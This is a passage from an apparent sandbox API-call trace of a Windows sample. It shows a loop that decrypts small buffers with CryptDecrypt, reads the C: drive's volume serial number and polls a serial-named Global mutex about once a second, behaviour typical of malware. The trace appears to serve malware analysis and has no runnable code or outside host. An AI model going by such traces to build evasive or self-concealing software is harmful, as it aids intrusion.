phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe92870) returned 1 [0057.282] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0057.282] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0057.282] CryptDestroyKey (hKey=0xe92870) returned 1 [0057.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0057.282] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x2c4 [0057.283] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x0) returned 0x102 [0057.283] CloseHandle (hObject=0x2c4) returned 1 [0057.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0057.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0057.283] Sleep (dwMilliseconds=0x3e8) [0058.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0058.540] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe92870) returned 1 [0058.540] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0058.540] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0058.540] CryptDestroyKey (hKey=0xe92870) returned 1 [0058.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0058.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0058.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af8068 [0058.541] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe92870) returned 1 [0058.541] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0058.541] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af8068, pdwDataLen=0x2abf984 | out: pbData=0x2af8068, pdwDataLen=0x2abf984) returned 1 [0058.541] CryptDestroyKey (hKey=0xe92870) returned 1 [0058.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af8068 | out: hHeap=0x2af0000) returned 1 [0058.541] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0058.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0058.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0058.541] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0058.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0058.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0058.541] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe92870) returned 1 [0058.541] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0058.541] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0058.541] CryptDestroyKey (hKey=0xe92870) returned 1 [0058.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0058.541] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x2c4 [0058.541] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x0) returned 0x102 [0058.541] CloseHandle (hObject=0x2c4) returned 1 [0058.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0058.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0058.542] Sleep (dwMilliseconds=0x3e8) [0060.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0060.114] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe92870) returned 1 [0060.114] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0060.114] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0060.114] CryptDestroyKey (hKey=0xe92870) returned 1 [0060.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0060.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0060.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af8820 [0060.114] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe92870) returned 1 [0060.114] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0060.114] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af8820, pdwDataLen=0x2abf984 | out: pbData=0x2af8820, pdwDataLen=0x2abf984) returned 1 [0060.114] CryptDestroyKey (hKey=0xe92870) returned 1 [0060.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af8820 | out: hHeap=0x2af0000) returned 1 [0060.114] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0060.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0060.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0060.114] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0060.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0060.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0060.115] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe92870) returned 1 [0060.115] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0060.115] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0060.115] CryptDestroyKey (hKey=0xe92870) returned 1 [0060.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0060.115] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x2c4 [0060.115] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x0) returned 0x102 [0060.115] CloseHandle (hObject=0x2c4) returned 1 [0060.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0060.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0060.115] Sleep (dwMilliseconds=0x3e8) [0061.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0061.534] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe92870) returned 1 [0061.534] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0061.534] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0061.535] CryptDestroyKey (hKey=0xe92870) returned 1 [0061.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0061.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0061.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af8198 [0061.535] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe92870) returned 1 [0061.535] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0061.535] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af8198, pdwDataLen=0x2abf984 | out: pbData=0x2af8198, pdwDataLen=0x2abf984) returned 1 [0061.535] CryptDestroyKey (hKey=0xe92870) returned 1 [0061.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af8198 | out: hHeap=0x2af0000) returned 1 [0061.535] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0061.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0061.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0061.535] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0061.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0061.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0061.535] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe92870) returned 1 [0061.535] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0061.535] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0061.535] CryptDestroyKey (hKey=0xe92870) returned 1 [0061.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0061.535] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x2c4 [0061.535] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x0) returned 0x102 [0061.536] CloseHandle (hObject=0x2c4) returned 1 [0061.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0061.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0061.536] Sleep (dwMilliseconds=0x3e8) [0062.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0062.782] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe92870) returned 1 [0062.782] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0062.782] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0062.782] CryptDestroyKey (hKey=0xe92870) returned 1 [0062.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0062.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0062.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af86f0 [0062.782] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe92870) returned 1 [0062.782] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0062.782] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af86f0, pdwDataLen=0x2abf984 | out: pbData=0x2af86f0, pdwDataLen=0x2abf984) returned 1 [0062.782] CryptDestroyKey (hKey=0xe92870) returned 1 [0062.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af86f0 | out: hHeap=0x2af0000) returned 1 [0062.782] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0062.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0062.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0062.783] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0062.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0062.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0062.783] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe92870) returned 1 [0062.783] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0062.783] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0062.783] CryptDestroyKey (hKey=0xe92870) returned 1 [0062.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0062.783] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x2c4 [0062.783] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x0) returned 0x102 [0062.783] CloseHandle (hObject=0x2c4) returned 1 [0062.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0062.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0062.783] Sleep (dwMilliseconds=0x3e8) [0064.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0064.097] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe92870) returned 1 [0064.097] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0064.097] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0064.114] CryptDestroyKey (hKey=0xe92870) returned 1 [0064.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0064.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0064.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af8820 [0064.114] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe92870) returned 1 [0064.114] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0064.114] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af8820, pdwDataLen=0x2abf984 | out: pbData=0x2af8820, pdwDataLen=0x2abf984) returned 1 [0064.114] CryptDestroyKey (hKey=0xe92870) returned 1 [0064.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af8820 | out: hHeap=0x2af0000) returned 1 [0064.114] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0064.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0064.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0064.115] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0064.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0064.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0064.115] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe92870) returned 1 [0064.115] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0064.115] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0064.115] CryptDestroyKey (hKey=0xe92870) returned 1 [0064.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0064.115] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x2c4 [0064.115] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x0) returned 0x102 [0064.115] CloseHandle (hObject=0x2c4) returned 1 [0064.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0064.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0064.115] Sleep (dwMilliseconds=0x3e8) [0065.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0065.495] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe92870) returned 1 [0065.495] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0065.496] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0065.496] CryptDestroyKey (hKey=0xe92870) returned 1 [0065.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0065.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0065.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af8788 [0065.496] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe92870) returned 1 [0065.496] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0065.496] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af8788, pdwDataLen=0x2abf984 | out: pbData=0x2af8788, pdwDataLen=0x2abf984) returned 1 [0065.496] CryptDestroyKey (hKey=0xe92870) returned 1 [0065.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af8788 | out: hHeap=0x2af0000) returned 1 [0065.496] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0065.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0065.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0065.496] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0065.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0065.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0065.496] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe92870) returned 1 [0065.496] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0065.496] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0065.496] CryptDestroyKey (hKey=0xe92870) returned 1 [0065.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0065.496] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x2c4 [0065.497] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x0) returned 0x102 [0065.497] CloseHandle (hObject=0x2c4) returned 1 [0065.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0065.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0065.497] Sleep (dwMilliseconds=0x3e8) [0066.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0066.677] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe92870) returned 1 [0066.682] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0066.688] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0066.690] CryptDestroyKey (hKey=0xe92870) returned 1 [0066.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0066.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0066.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af86f0 [0066.716] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe92870) returned 1 [0066.716] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0066.716] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af86f0, pdwDataLen=0x2abf984 | out: pbData=0x2af86f0, pdwDataLen=0x2abf984) returned 1 [0066.716] CryptDestroyKey (hKey=0xe92870) returned 1 [0066.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af86f0 | out: hHeap=0x2af0000) returned 1 [0066.716] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0066.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0066.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0066.716] GetVolumeInformationW (in: lpRootPathName="C:\\", 